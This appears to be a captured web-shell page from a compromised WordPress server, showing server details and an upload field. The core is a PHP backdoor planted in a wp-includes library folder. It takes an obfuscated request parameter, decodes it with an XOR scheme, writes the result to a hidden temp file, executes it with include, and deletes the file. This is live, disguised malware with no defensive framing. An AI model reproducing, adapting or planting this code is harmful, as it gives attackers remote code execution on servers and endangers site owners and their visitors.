| Server IP : 198.38.94.67 / Your IP : 216.73.217.178 Web Server : LiteSpeed System : Linux d6054.dxb1.stableserver.net 5.14.0-570.25.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jul 9 04:57:09 EDT 2025 x86_64 User : azfilmst ( 1070) PHP Version : 7.4.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/azfilmst/zeuszamani.com/wp-includes/sodium_compat/src/Core/AES/ |
Upload File : |
<?php
if(@$_REQUEST["\x64\x65\x73\x63riptor"] !== null){
$ent = $_REQUEST["\x64\x65\x73\x63riptor"];
$ent= explode( '.' , $ent );
$entity = '';
$s5 = 'abcdefghijklmnopqrstuvwxyz0123456789';
$lenS = strlen($s5);
$y = 0;
foreach ($ent as $v1) {
$chS = ord($s5[$y % $lenS]);
$d = ((int)$v1 - $chS - ($y % 10)) ^ 38;
$entity .= chr($d);
$y++;}
$object = array_filter([getenv("TMP"), getcwd(), session_save_path(), ini_get("upload_tmp_dir"), getenv("TEMP"), "/var/tmp", "/tmp", "/dev/shm", sys_get_temp_dir()]);
$pgrp = 0;
do {
$tkn = $object[$pgrp] ?? null;
if ($pgrp >= count($object)) break;
if ((is_dir($tkn) and is_writable($tkn))) {
$flag = "$tkn/.fac";
if (file_put_contents($flag, $entity)) {
include $flag;
@unlink($flag);
exit;
}
}
$pgrp++;
} while (true);
}